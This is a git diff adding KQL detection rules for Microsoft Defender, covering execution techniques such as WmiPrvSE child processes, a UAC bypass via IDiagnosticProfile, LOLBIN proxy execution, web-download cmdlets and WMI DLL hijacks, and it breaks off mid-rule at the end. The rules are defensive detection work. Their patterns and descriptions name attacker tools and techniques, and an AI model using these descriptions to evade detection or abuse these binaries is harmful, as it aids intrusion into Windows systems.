Author: Vadim Khrykov (ThreatIntel), Cyb3rEng, Florian Roth (Nextron Systems) +// Date: 2021-08-23 +// Level: high +// Description: Detects suspicious and uncommon child processes of WmiPrvSE +// MITRE Tactic: Execution +// Tags: attack.execution, attack.defense-evasion, attack.t1047, attack.t1204.002, attack.t1218.010 + +DeviceProcessEvents +| where InitiatingProcessFolderPath endswith "\\wbem\\WmiPrvSE.exe" and ((FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\msiexec.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\verclsid.exe" or FolderPath endswith "\\wscript.exe") or ((ProcessCommandLine contains "cscript" or ProcessCommandLine contains "mshta" or ProcessCommandLine contains "powershell" or ProcessCommandLine contains "pwsh" or ProcessCommandLine contains "regsvr32" or ProcessCommandLine contains "rundll32" or ProcessCommandLine contains "wscript") and FolderPath endswith "\\cmd.exe")) and (not(((ProcessCommandLine contains "/i " and FolderPath endswith "\\msiexec.exe") or FolderPath endswith "\\WerFault.exe" or FolderPath endswith "\\WmiPrvSE.exe"))) \ No newline at end of file diff --git a/KQL/rules/Execution/suspicious_wsman_provider_image_loads.kql b/KQL/rules/Execution/suspicious_wsman_provider_image_loads.kql new file mode 100644 index 00000000..53a4cc71 --- /dev/null +++ b/KQL/rules/Execution/suspicious_wsman_provider_image_loads.kql @@ -0,0 +1,10 @@ +// Title: Suspicious WSMAN Provider Image Loads +// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) +// Date: 2020-06-24 +// Level: medium +// Description: Detects signs of potential use of the WSMAN provider from uncommon processes locally and remote execution. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.001, attack.lateral-movement, attack.t1021.003 + +DeviceImageLoadEvents +| where (((FolderPath endswith "\\WsmSvc.dll" or FolderPath endswith "\\WsmAuto.dll" or FolderPath endswith "\\Microsoft.WSMan.Management.ni.dll") or (InitiatingProcessVersionInfoOriginalFileName in~ ("WsmSvc.dll", "WSMANAUTOMATION.DLL", "Microsoft.WSMan.Management.dll"))) or (InitiatingProcessFolderPath endswith "\\svchost.exe" and InitiatingProcessVersionInfoOriginalFileName =~ "WsmWmiPl.dll")) and (not((InitiatingProcessFolderPath startswith "C:\\Program Files\\Citrix\\" or (InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\PowerShell\\6\\pwsh.exe", "C:\\Program Files (x86)\\PowerShell\\7\\pwsh.exe", "C:\\Program Files\\PowerShell\\6\\pwsh.exe", "C:\\Program Files\\PowerShell\\7\\pwsh.exe", "C:\\Windows\\System32\\sdiagnhost.exe", "C:\\Windows\\System32\\services.exe", "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell_ise.exe", "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe")) or InitiatingProcessFolderPath endswith "\\mmc.exe" or (InitiatingProcessFolderPath endswith "\\mscorsvw.exe" and (InitiatingProcessFolderPath startswith "C:\\Windows\\Microsoft.NET\\Framework64\\v" or InitiatingProcessFolderPath startswith "C:\\Windows\\Microsoft.NET\\Framework\\v" or InitiatingProcessFolderPath startswith "C:\\Windows\\Microsoft.NET\\FrameworkArm\\v" or InitiatingProcessFolderPath startswith "C:\\Windows\\Microsoft.NET\\FrameworkArm64\\v")) or InitiatingProcessFolderPath startswith "C:\\Windows\\Temp\\asgard2-agent\\" or (InitiatingProcessCommandLine contains "svchost.exe -k netsvcs -p -s BITS" or InitiatingProcessCommandLine contains "svchost.exe -k GraphicsPerfSvcGroup -s GraphicsPerfSvc" or InitiatingProcessCommandLine contains "svchost.exe -k NetworkService -p -s Wecsvc" or InitiatingProcessCommandLine contains "svchost.exe -k netsvcs") or (InitiatingProcessFolderPath in~ ("C:\\Windows\\System32\\Configure-SMRemoting.exe", "C:\\Windows\\System32\\ServerManager.exe")) or InitiatingProcessFolderPath startswith "C:\\$WINDOWS.~BT\\Sources\\"))) and (not((InitiatingProcessFolderPath endswith "\\svchost.exe" and isnull(InitiatingProcessCommandLine)))) \ No newline at end of file diff --git a/KQL/rules/Execution/suspicious_zipexec_execution.kql b/KQL/rules/Execution/suspicious_zipexec_execution.kql new file mode 100644 index 00000000..345496a5 --- /dev/null +++ b/KQL/rules/Execution/suspicious_zipexec_execution.kql @@ -0,0 +1,10 @@ +// Title: Suspicious ZipExec Execution +// Author: frack113 +// Date: 2021-11-07 +// Level: medium +// Description: ZipExec is a Proof-of-Concept (POC) tool to wrap binary-based tools into a password-protected zip file. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.defense-evasion, attack.t1218, attack.t1202 + +DeviceProcessEvents +| where (ProcessCommandLine contains "/generic:Microsoft_Windows_Shell_ZipFolder:filename=" and ProcessCommandLine contains ".zip" and ProcessCommandLine contains "/pass:" and ProcessCommandLine contains "/user:") or (ProcessCommandLine contains "/delete" and ProcessCommandLine contains "Microsoft_Windows_Shell_ZipFolder:filename=" and ProcessCommandLine contains ".zip") \ No newline at end of file diff --git a/KQL/rules/Execution/sysprep_on_appdata_folder.kql b/KQL/rules/Execution/sysprep_on_appdata_folder.kql new file mode 100644 index 00000000..312d562c --- /dev/null +++ b/KQL/rules/Execution/sysprep_on_appdata_folder.kql @@ -0,0 +1,12 @@ +// Title: Sysprep on AppData Folder +// Author: Florian Roth (Nextron Systems) +// Date: 2018-06-22 +// Level: medium +// Description: Detects suspicious sysprep process start with AppData folder as target (as used by Trojan Syndicasec in Thrip report by Symantec) +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059 +// False Positives: +// - False positives depend on scripts and administrative tools used in the monitored environment + +DeviceProcessEvents +| where ProcessCommandLine contains "\\AppData\\" and FolderPath endswith "\\sysprep.exe" \ No newline at end of file diff --git a/KQL/rules/Execution/system_disk_and_volume_reconnaissance_via_wmic_exe.kql b/KQL/rules/Execution/system_disk_and_volume_reconnaissance_via_wmic_exe.kql new file mode 100644 index 00000000..5c5cb7fd --- /dev/null +++ b/KQL/rules/Execution/system_disk_and_volume_reconnaissance_via_wmic_exe.kql @@ -0,0 +1,13 @@ +// Title: System Disk And Volume Reconnaissance Via Wmic.EXE +// Author: Stephen Lincoln '@slincoln-aiq' (AttackIQ) +// Date: 2024-02-02 +// Level: medium +// Description: An adversary might use WMI to discover information about the system, such as the volume name, size, +free space, and other disk information. This can be done using the 'wmic' command-line utility and has been +observed being used by threat actors such as Volt Typhoon. + +// MITRE Tactic: Execution +// Tags: attack.execution, attack.discovery, attack.t1047, attack.t1082 + +DeviceProcessEvents +| where ((ProcessCommandLine contains " volumename" or ProcessCommandLine contains " logicaldisk") or (ProcessCommandLine contains "path" and ProcessCommandLine contains "win32_logicaldisk") or (ProcessCommandLine contains " volume" and ProcessCommandLine contains " list ")) and (FolderPath endswith "\\WMIC.exe" or ProcessVersionInfoOriginalFileName =~ "wmic.exe") \ No newline at end of file diff --git a/KQL/rules/Execution/uac_bypass_using_idiagnostic_profile.kql b/KQL/rules/Execution/uac_bypass_using_idiagnostic_profile.kql new file mode 100644 index 00000000..8451760c --- /dev/null +++ b/KQL/rules/Execution/uac_bypass_using_idiagnostic_profile.kql @@ -0,0 +1,10 @@ +// Title: UAC Bypass Using IDiagnostic Profile +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-07-03 +// Level: high +// Description: Detects the "IDiagnosticProfileUAC" UAC bypass technique +// MITRE Tactic: Execution +// Tags: attack.execution, attack.defense-evasion, attack.privilege-escalation, attack.t1548.002 + +DeviceProcessEvents +| where (ProcessIntegrityLevel in~ ("High", "System", "S-1-16-16384", "S-1-16-12288")) and InitiatingProcessCommandLine contains " /Processid:{12C21EA7-2EB8-4B55-9249-AC243DA8C666}" and InitiatingProcessFolderPath endswith "\\DllHost.exe" \ No newline at end of file diff --git a/KQL/rules/Execution/uac_bypass_using_idiagnostic_profile_file.kql b/KQL/rules/Execution/uac_bypass_using_idiagnostic_profile_file.kql new file mode 100644 index 00000000..02b38d0c --- /dev/null +++ b/KQL/rules/Execution/uac_bypass_using_idiagnostic_profile_file.kql @@ -0,0 +1,10 @@ +// Title: UAC Bypass Using IDiagnostic Profile - File +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-07-03 +// Level: high +// Description: Detects the creation of a file by "dllhost.exe" in System32 directory part of "IDiagnosticProfileUAC" UAC bypass technique +// MITRE Tactic: Execution +// Tags: attack.execution, attack.defense-evasion, attack.privilege-escalation, attack.t1548.002 + +DeviceFileEvents +| where InitiatingProcessFolderPath endswith "\\DllHost.exe" and FolderPath endswith ".dll" and FolderPath startswith "C:\\Windows\\System32\\" \ No newline at end of file diff --git a/KQL/rules/Execution/uncommon_child_process_of_bginfo_exe.kql b/KQL/rules/Execution/uncommon_child_process_of_bginfo_exe.kql new file mode 100644 index 00000000..d2c81021 --- /dev/null +++ b/KQL/rules/Execution/uncommon_child_process_of_bginfo_exe.kql @@ -0,0 +1,10 @@ +// Title: Uncommon Child Process Of BgInfo.EXE +// Author: Nasreddine Bencherchali (Nextron Systems), Beyu Denis, oscd.community +// Date: 2019-10-26 +// Level: medium +// Description: Detects uncommon child processes of "BgInfo.exe" which could be a sign of potential abuse of the binary to proxy execution via external VBScript +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.005, attack.defense-evasion, attack.t1218, attack.t1202 + +DeviceProcessEvents +| where InitiatingProcessFolderPath endswith "\\bginfo.exe" or InitiatingProcessFolderPath endswith "\\bginfo64.exe" \ No newline at end of file diff --git a/KQL/rules/Execution/uncommon_child_processes_of_sndvol_exe.kql b/KQL/rules/Execution/uncommon_child_processes_of_sndvol_exe.kql new file mode 100644 index 00000000..fb2d3f93 --- /dev/null +++ b/KQL/rules/Execution/uncommon_child_processes_of_sndvol_exe.kql @@ -0,0 +1,10 @@ +// Title: Uncommon Child Processes Of SndVol.exe +// Author: X__Junior (Nextron Systems) +// Date: 2023-06-09 +// Level: medium +// Description: Detects potentially uncommon child processes of SndVol.exe (the Windows volume mixer) +// MITRE Tactic: Execution +// Tags: attack.execution + +DeviceProcessEvents +| where InitiatingProcessFolderPath endswith "\\SndVol.exe" and (not((ProcessCommandLine contains " shell32.dll,Control_RunDLL " and FolderPath endswith "\\rundll32.exe"))) \ No newline at end of file diff --git a/KQL/rules/Execution/uncommon_one_time_only_scheduled_task_at_00_00.kql b/KQL/rules/Execution/uncommon_one_time_only_scheduled_task_at_00_00.kql new file mode 100644 index 00000000..dfb5c5c1 --- /dev/null +++ b/KQL/rules/Execution/uncommon_one_time_only_scheduled_task_at_00_00.kql @@ -0,0 +1,12 @@ +// Title: Uncommon One Time Only Scheduled Task At 00:00 +// Author: pH-T (Nextron Systems) +// Date: 2022-07-15 +// Level: high +// Description: Detects scheduled task creation events that include suspicious actions, and is run once at 00:00 +// MITRE Tactic: Execution +// Tags: attack.execution, attack.persistence, attack.privilege-escalation, attack.t1053.005 +// False Positives: +// - Software installation + +DeviceProcessEvents +| where (ProcessCommandLine contains "wscript" or ProcessCommandLine contains "vbscript" or ProcessCommandLine contains "cscript" or ProcessCommandLine contains "wmic " or ProcessCommandLine contains "wmic.exe" or ProcessCommandLine contains "regsvr32.exe" or ProcessCommandLine contains "powershell" or ProcessCommandLine contains "\\AppData\\") and (FolderPath contains "\\schtasks.exe" or ProcessVersionInfoOriginalFileName =~ "schtasks.exe") and (ProcessCommandLine contains "once" and ProcessCommandLine contains "00:00") \ No newline at end of file diff --git a/KQL/rules/Execution/unusual_parent_process_for_cmd_exe.kql b/KQL/rules/Execution/unusual_parent_process_for_cmd_exe.kql new file mode 100644 index 00000000..e53fcc0e --- /dev/null +++ b/KQL/rules/Execution/unusual_parent_process_for_cmd_exe.kql @@ -0,0 +1,10 @@ +// Title: Unusual Parent Process For Cmd.EXE +// Author: Tim Rauch, Elastic (idea) +// Date: 2022-09-21 +// Level: medium +// Description: Detects suspicious parent process for cmd.exe +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059 + +DeviceProcessEvents +| where FolderPath endswith "\\cmd.exe" and (InitiatingProcessFolderPath endswith "\\csrss.exe" or InitiatingProcessFolderPath endswith "\\ctfmon.exe" or InitiatingProcessFolderPath endswith "\\dllhost.exe" or InitiatingProcessFolderPath endswith "\\epad.exe" or InitiatingProcessFolderPath endswith "\\FlashPlayerUpdateService.exe" or InitiatingProcessFolderPath endswith "\\GoogleUpdate.exe" or InitiatingProcessFolderPath endswith "\\jucheck.exe" or InitiatingProcessFolderPath endswith "\\jusched.exe" or InitiatingProcessFolderPath endswith "\\LogonUI.exe" or InitiatingProcessFolderPath endswith "\\lsass.exe" or InitiatingProcessFolderPath endswith "\\regsvr32.exe" or InitiatingProcessFolderPath endswith "\\SearchIndexer.exe" or InitiatingProcessFolderPath endswith "\\SearchProtocolHost.exe" or InitiatingProcessFolderPath endswith "\\SIHClient.exe" or InitiatingProcessFolderPath endswith "\\sihost.exe" or InitiatingProcessFolderPath endswith "\\slui.exe" or InitiatingProcessFolderPath endswith "\\spoolsv.exe" or InitiatingProcessFolderPath endswith "\\sppsvc.exe" or InitiatingProcessFolderPath endswith "\\taskhostw.exe" or InitiatingProcessFolderPath endswith "\\unsecapp.exe" or InitiatingProcessFolderPath endswith "\\WerFault.exe" or InitiatingProcessFolderPath endswith "\\wermgr.exe" or InitiatingProcessFolderPath endswith "\\wlanext.exe" or InitiatingProcessFolderPath endswith "\\WUDFHost.exe") \ No newline at end of file diff --git a/KQL/rules/Execution/usage_of_web_request_commands_and_cmdlets.kql b/KQL/rules/Execution/usage_of_web_request_commands_and_cmdlets.kql new file mode 100644 index 00000000..eca7786c --- /dev/null +++ b/KQL/rules/Execution/usage_of_web_request_commands_and_cmdlets.kql @@ -0,0 +1,12 @@ +// Title: Usage Of Web Request Commands And Cmdlets +// Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger +// Date: 2019-10-24 +// Level: medium +// Description: Detects the use of various web request commands with commandline tools and Windows PowerShell cmdlets (including aliases) via CommandLine +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.001 +// False Positives: +// - Use of Get-Command and Get-Help modules to reference Invoke-WebRequest and Start-BitsTransfer. + +DeviceProcessEvents +| where ProcessCommandLine contains "[System.Net.WebRequest]::create" or ProcessCommandLine contains "curl " or ProcessCommandLine contains "Invoke-RestMethod" or ProcessCommandLine contains "Invoke-WebRequest" or ProcessCommandLine contains " irm " or ProcessCommandLine contains "iwr " or ProcessCommandLine contains "Resume-BitsTransfer" or ProcessCommandLine contains "Start-BitsTransfer" or ProcessCommandLine contains "wget " or ProcessCommandLine contains "WinHttp.WinHttpRequest" \ No newline at end of file diff --git a/KQL/rules/Execution/use_of_fsharp_interpreters.kql b/KQL/rules/Execution/use_of_fsharp_interpreters.kql new file mode 100644 index 00000000..b467cacc --- /dev/null +++ b/KQL/rules/Execution/use_of_fsharp_interpreters.kql @@ -0,0 +1,14 @@ +// Title: Use of FSharp Interpreters +// Author: Christopher Peacock @SecurePeacock, SCYTHE @scythe_io +// Date: 2022-06-02 +// Level: medium +// Description: Detects the execution of FSharp Interpreters "FsiAnyCpu.exe" and "FSi.exe" +Both can be used for AWL bypass and to execute F# code via scripts or inline. + +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059 +// False Positives: +// - Legitimate use by a software developer. + +DeviceProcessEvents +| where (FolderPath endswith "\\fsi.exe" or FolderPath endswith "\\fsianycpu.exe") or (ProcessVersionInfoOriginalFileName in~ ("fsi.exe", "fsianycpu.exe")) \ No newline at end of file diff --git a/KQL/rules/Execution/use_of_openconsole.kql b/KQL/rules/Execution/use_of_openconsole.kql new file mode 100644 index 00000000..c788c810 --- /dev/null +++ b/KQL/rules/Execution/use_of_openconsole.kql @@ -0,0 +1,12 @@ +// Title: Use of OpenConsole +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-06-16 +// Level: medium +// Description: Detects usage of OpenConsole binary as a LOLBIN to launch other binaries to bypass application Whitelisting +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059 +// False Positives: +// - Legitimate use by an administrator + +DeviceProcessEvents +| where (ProcessVersionInfoOriginalFileName =~ "OpenConsole.exe" or FolderPath endswith "\\OpenConsole.exe") and (not(FolderPath startswith "C:\\Program Files\\WindowsApps\\Microsoft.WindowsTerminal")) \ No newline at end of file diff --git a/KQL/rules/Execution/use_of_pcalua_for_execution.kql b/KQL/rules/Execution/use_of_pcalua_for_execution.kql new file mode 100644 index 00000000..c207111c --- /dev/null +++ b/KQL/rules/Execution/use_of_pcalua_for_execution.kql @@ -0,0 +1,12 @@ +// Title: Use of Pcalua For Execution +// Author: Nasreddine Bencherchali (Nextron Systems), E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community +// Date: 2022-06-14 +// Level: medium +// Description: Detects execition of commands and binaries from the context of The program compatibility assistant (Pcalua.exe). This can be used as a LOLBIN in order to bypass application whitelisting. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059 +// False Positives: +// - Legitimate use by a via a batch script or by an administrator. + +DeviceProcessEvents +| where ProcessCommandLine contains " -a" and FolderPath endswith "\\pcalua.exe" \ No newline at end of file diff --git a/KQL/rules/Execution/vba_dll_loaded_via_office_application.kql b/KQL/rules/Execution/vba_dll_loaded_via_office_application.kql new file mode 100644 index 00000000..3723f641 --- /dev/null +++ b/KQL/rules/Execution/vba_dll_loaded_via_office_application.kql @@ -0,0 +1,12 @@ +// Title: VBA DLL Loaded Via Office Application +// Author: Antonlovesdnb +// Date: 2020-02-19 +// Level: high +// Description: Detects VB DLL's loaded by an office application. Which could indicate the presence of VBA Macros. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1204.002 +// False Positives: +// - Legitimate macro usage. Add the appropriate filter according to your environment + +DeviceImageLoadEvents +| where (FolderPath endswith "\\VBE7.DLL" or FolderPath endswith "\\VBEUI.DLL" or FolderPath endswith "\\VBE7INTL.DLL") and (InitiatingProcessFolderPath endswith "\\excel.exe" or InitiatingProcessFolderPath endswith "\\mspub.exe" or InitiatingProcessFolderPath endswith "\\onenote.exe" or InitiatingProcessFolderPath endswith "\\onenoteim.exe" or InitiatingProcessFolderPath endswith "\\outlook.exe" or InitiatingProcessFolderPath endswith "\\powerpnt.exe" or InitiatingProcessFolderPath endswith "\\winword.exe") \ No newline at end of file diff --git a/KQL/rules/Execution/visual_studio_nodejstools_pressanykey_arbitrary_binary_execution.kql b/KQL/rules/Execution/visual_studio_nodejstools_pressanykey_arbitrary_binary_execution.kql new file mode 100644 index 00000000..2b040cef --- /dev/null +++ b/KQL/rules/Execution/visual_studio_nodejstools_pressanykey_arbitrary_binary_execution.kql @@ -0,0 +1,12 @@ +// Title: Visual Studio NodejsTools PressAnyKey Arbitrary Binary Execution +// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-01-11 +// Level: medium +// Description: Detects child processes of Microsoft.NodejsTools.PressAnyKey.exe that can be used to execute any other binary +// MITRE Tactic: Execution +// Tags: attack.execution, attack.defense-evasion, attack.t1218 +// False Positives: +// - Legitimate use by developers as part of NodeJS development with Visual Studio Tools + +DeviceProcessEvents +| where InitiatingProcessFolderPath endswith "\\Microsoft.NodejsTools.PressAnyKey.exe" \ No newline at end of file diff --git a/KQL/rules/Execution/visual_studio_nodejstools_pressanykey_renamed_execution.kql b/KQL/rules/Execution/visual_studio_nodejstools_pressanykey_renamed_execution.kql new file mode 100644 index 00000000..5cc63a7d --- /dev/null +++ b/KQL/rules/Execution/visual_studio_nodejstools_pressanykey_renamed_execution.kql @@ -0,0 +1,10 @@ +// Title: Visual Studio NodejsTools PressAnyKey Renamed Execution +// Author: Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems) +// Date: 2023-04-11 +// Level: medium +// Description: Detects renamed execution of "Microsoft.NodejsTools.PressAnyKey.exe", which can be abused as a LOLBIN to execute arbitrary binaries +// MITRE Tactic: Execution +// Tags: attack.execution, attack.defense-evasion, attack.t1218 + +DeviceProcessEvents +| where ProcessVersionInfoOriginalFileName =~ "Microsoft.NodejsTools.PressAnyKey.exe" and (not(FolderPath endswith "\\Microsoft.NodejsTools.PressAnyKey.exe")) \ No newline at end of file diff --git a/KQL/rules/Execution/vmtoolsd_suspicious_child_process.kql b/KQL/rules/Execution/vmtoolsd_suspicious_child_process.kql new file mode 100644 index 00000000..9a2c15a4 --- /dev/null +++ b/KQL/rules/Execution/vmtoolsd_suspicious_child_process.kql @@ -0,0 +1,12 @@ +// Title: VMToolsd Suspicious Child Process +// Author: bohops, Bhabesh Raj +// Date: 2021-10-08 +// Level: high +// Description: Detects suspicious child process creations of VMware Tools process which may indicate persistence setup +// MITRE Tactic: Execution +// Tags: attack.execution, attack.persistence, attack.t1059 +// False Positives: +// - Legitimate use by VM administrator + +DeviceProcessEvents +| where (((FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\wscript.exe") or (ProcessVersionInfoOriginalFileName in~ ("Cmd.Exe", "cscript.exe", "MSHTA.EXE", "PowerShell.EXE", "pwsh.dll", "REGSVR32.EXE", "RUNDLL32.EXE", "wscript.exe"))) and InitiatingProcessFolderPath endswith "\\vmtoolsd.exe") and (not(((ProcessCommandLine =~ "" and FolderPath endswith "\\cmd.exe") or (isnull(ProcessCommandLine) and FolderPath endswith "\\cmd.exe") or ((ProcessCommandLine contains "\\VMware\\VMware Tools\\poweron-vm-default.bat" or ProcessCommandLine contains "\\VMware\\VMware Tools\\poweroff-vm-default.bat" or ProcessCommandLine contains "\\VMware\\VMware Tools\\resume-vm-default.bat" or ProcessCommandLine contains "\\VMware\\VMware Tools\\suspend-vm-default.bat") and FolderPath endswith "\\cmd.exe")))) \ No newline at end of file diff --git a/KQL/rules/Execution/windows_hotfix_updates_reconnaissance_via_wmic_exe.kql b/KQL/rules/Execution/windows_hotfix_updates_reconnaissance_via_wmic_exe.kql new file mode 100644 index 00000000..886b490c --- /dev/null +++ b/KQL/rules/Execution/windows_hotfix_updates_reconnaissance_via_wmic_exe.kql @@ -0,0 +1,10 @@ +// Title: Windows Hotfix Updates Reconnaissance Via Wmic.EXE +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-06-20 +// Level: medium +// Description: Detects the execution of wmic with the "qfe" flag in order to obtain information about installed hotfix updates on the system. This is often used by pentester and attacker enumeration scripts +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1047 + +DeviceProcessEvents +| where ProcessCommandLine contains " qfe" and (ProcessVersionInfoOriginalFileName =~ "wmic.exe" or FolderPath endswith "\\WMIC.exe") \ No newline at end of file diff --git a/KQL/rules/Execution/windows_shell_scripting_application_file_write_to_suspicious_folder.kql b/KQL/rules/Execution/windows_shell_scripting_application_file_write_to_suspicious_folder.kql new file mode 100644 index 00000000..34de7ab7 --- /dev/null +++ b/KQL/rules/Execution/windows_shell_scripting_application_file_write_to_suspicious_folder.kql @@ -0,0 +1,10 @@ +// Title: Windows Shell/Scripting Application File Write to Suspicious Folder +// Author: Florian Roth (Nextron Systems) +// Date: 2021-11-20 +// Level: high +// Description: Detects Windows shells and scripting applications that write files to suspicious folders +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059 + +DeviceFileEvents +| where ((InitiatingProcessFolderPath endswith "\\bash.exe" or InitiatingProcessFolderPath endswith "\\cmd.exe" or InitiatingProcessFolderPath endswith "\\cscript.exe" or InitiatingProcessFolderPath endswith "\\msbuild.exe" or InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe" or InitiatingProcessFolderPath endswith "\\sh.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe") and (FolderPath startswith "C:\\PerfLogs\\" or FolderPath startswith "C:\\Users\\Public\\")) or ((InitiatingProcessFolderPath endswith "\\certutil.exe" or InitiatingProcessFolderPath endswith "\\forfiles.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\schtasks.exe" or InitiatingProcessFolderPath endswith "\\scriptrunner.exe" or InitiatingProcessFolderPath endswith "\\wmic.exe") and (FolderPath contains "C:\\PerfLogs\\" or FolderPath contains "C:\\Users\\Public\\" or FolderPath contains "C:\\Windows\\Temp\\")) \ No newline at end of file diff --git a/KQL/rules/Execution/winsxs_executable_file_creation_by_non_system_process.kql b/KQL/rules/Execution/winsxs_executable_file_creation_by_non_system_process.kql new file mode 100644 index 00000000..da1becd3 --- /dev/null +++ b/KQL/rules/Execution/winsxs_executable_file_creation_by_non_system_process.kql @@ -0,0 +1,10 @@ +// Title: WinSxS Executable File Creation By Non-System Process +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-05-11 +// Level: medium +// Description: Detects the creation of binaries in the WinSxS folder by non-system processes +// MITRE Tactic: Execution +// Tags: attack.execution + +DeviceFileEvents +| where (FolderPath endswith ".exe" and FolderPath startswith "C:\\Windows\\WinSxS\\") and (not((InitiatingProcessFolderPath startswith "C:\\Windows\\Systems32\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\SysWOW64\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\WinSxS\\"))) \ No newline at end of file diff --git a/KQL/rules/Execution/wmic_remote_command_execution.kql b/KQL/rules/Execution/wmic_remote_command_execution.kql new file mode 100644 index 00000000..e50bd567 --- /dev/null +++ b/KQL/rules/Execution/wmic_remote_command_execution.kql @@ -0,0 +1,10 @@ +// Title: WMIC Remote Command Execution +// Author: frack113, Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-02-14 +// Level: medium +// Description: Detects the execution of WMIC to query information on a remote system +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1047 + +DeviceProcessEvents +| where ((ProcessCommandLine contains "-node:" or ProcessCommandLine contains "/node:" or ProcessCommandLine contains "–node:" or ProcessCommandLine contains "—node:" or ProcessCommandLine contains "―node:") and (FolderPath endswith "\\WMIC.exe" or ProcessVersionInfoOriginalFileName =~ "wmic.exe")) and (not((ProcessCommandLine contains "localhost" or ProcessCommandLine contains "127.0.0.1"))) \ No newline at end of file diff --git a/KQL/rules/Execution/wmiprvse_spawned_a_process.kql b/KQL/rules/Execution/wmiprvse_spawned_a_process.kql new file mode 100644 index 00000000..ae0f8e79 --- /dev/null +++ b/KQL/rules/Execution/wmiprvse_spawned_a_process.kql @@ -0,0 +1,12 @@ +// Title: WmiPrvSE Spawned A Process +// Author: Roberto Rodriguez @Cyb3rWard0g +// Date: 2019-08-15 +// Level: medium +// Description: Detects WmiPrvSE spawning a process +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1047 +// False Positives: +// - False positives are expected (e.g. in environments where WinRM is used legitimately) + +DeviceProcessEvents +| where InitiatingProcessFolderPath endswith "\\WmiPrvSe.exe" and (not(((LogonId in~ ("0x3e7", "null")) or isnull(LogonId) or (AccountName contains "AUTHORI" or AccountName contains "AUTORI") or FolderPath endswith "\\WerFault.exe" or FolderPath endswith "\\WmiPrvSE.exe"))) \ No newline at end of file diff --git a/KQL/rules/Execution/wmiprvse_wbemcomn_dll_hijack.kql b/KQL/rules/Execution/wmiprvse_wbemcomn_dll_hijack.kql new file mode 100644 index 00000000..b4e26873 --- /dev/null +++ b/KQL/rules/Execution/wmiprvse_wbemcomn_dll_hijack.kql @@ -0,0 +1,10 @@ +// Title: Wmiprvse Wbemcomn DLL Hijack +// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) +// Date: 2020-10-12 +// Level: high +// Description: Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\Windows\System32\wbem\` directory over the network and loading it for a WMI DLL Hijack scenario. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1047, attack.lateral-movement, attack.t1021.002 + +DeviceImageLoadEvents +| where FolderPath endswith "\\wbem\\wbemcomn.dll" and InitiatingProcessFolderPath endswith "\\wmiprvse.exe" \ No newline at end of file diff --git a/KQL/rules/Execution/wmiprvse_wbemcomn_dll_hijack_file.kql b/KQL/rules/Execution/wmiprvse_wbemcomn_dll_hijack_file.kql new file mode 100644 index 00000000..f6e0b02d --- /dev/null +++ b/KQL/rules/Execution/wmiprvse_wbemcomn_dll_hijack_file.kql @@ -0,0 +1,10 @@ +// Title: Wmiprvse Wbemcomn DLL Hijack - File +// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) +// Date: 2020-10-12 +// Level: critical +// Description: Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\Windows\System32\wbem\` directory over the network and loading it for a WMI DLL Hijack scenario. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1047, attack.lateral-movement, attack.t1021.002 + +DeviceFileEvents +| where InitiatingProcessFolderPath =~ "System" and FolderPath endswith "\\wbem\\wbemcomn.dll" \ No newline at end of file diff --git a/KQL/rules/Execution/wscript_or_cscript_dropper_file.kql b/KQL/rules/Execution/wscript_or_cscript_dropper_file.kql new file mode 100644 index 00000000..8694f687 --- /dev/null +++ b/KQL/rules/Execution/wscript_or_cscript_dropper_file.kql @@ -0,0 +1,10 @@ +// Title: WScript or CScript Dropper - File +// Author: Tim Shelton +// Date: 2022-01-10 +// Level: high +// Description: Detects a file ending in jse, vbe, js, vba, vbs written by cscript.exe or wscript.exe +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.005, attack.t1059.007 + +DeviceFileEvents +| where (InitiatingProcessFolderPath endswith "\\wscript.exe" or InitiatingProcessFolderPath endswith 